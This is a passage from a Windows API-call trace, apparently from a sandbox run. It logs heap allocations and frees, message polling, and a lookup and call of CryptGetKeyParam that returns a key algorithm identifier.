RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0117.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0117.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0117.440] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0117.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0117.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0117.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0117.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0117.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0117.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0117.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0117.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0117.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0117.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0117.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0117.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0117.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0117.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0117.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0117.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0117.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0117.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0117.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0117.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0117.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0580 | out: hHeap=0x1780000) returned 1 [0117.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0117.440] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0117.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0328 [0117.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0117.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0117.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0117.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0117.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0117.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0117.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0378 [0117.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0117.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0117.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0117.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0117.445] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0117.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0117.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabc8 [0117.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0117.445] PeekMessageW (in: lpMsg=0x144db3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144db3c) returned 0 [0117.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0117.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0117.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0117.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0117.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0117.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0117.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0117.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0117.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0117.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0117.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0117.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0117.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0117.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0117.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0117.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0117.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0117.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0117.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0117.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0117.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0117.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0117.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0117.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0117.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0117.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0117.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0117.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0117.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0117.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0117.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0117.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0117.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0117.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0117.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0378 | out: hHeap=0x1780000) returned 1 [0117.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0117.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0117.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0117.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0117.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0117.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0117.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0117.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0117.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0117.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0117.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0117.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0117.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0117.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d04e0 [0117.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0117.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0117.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0117.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0117.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0117.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0117.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0117.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d04e0 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0117.448] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0117.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0117.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0117.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0117.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0117.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0117.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796f08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0117.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0117.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0117.449] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0117.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03f0 | out: hHeap=0x1780000) returned 1 [0117.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0117.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0117.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0117.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0117.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0117.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0117.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03c8 | out: hHeap=0x1780000) returned 1 [0117.449] CryptGetKeyParam (in: hKey=0x41ac000, dwParam=0x7, pbData=0x43e29f0, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e29f0*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0117.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0117.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0117.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0117.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0117.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0117.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0117.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0117.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0530 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0117.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0117.451] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0117.451] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0117.451] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0117.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0117.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0117.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0117.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0117.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0117.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0117.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0117.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0117.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0117.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0117.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0580 | out: hHeap=0x1780000) returned 1 [0117.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 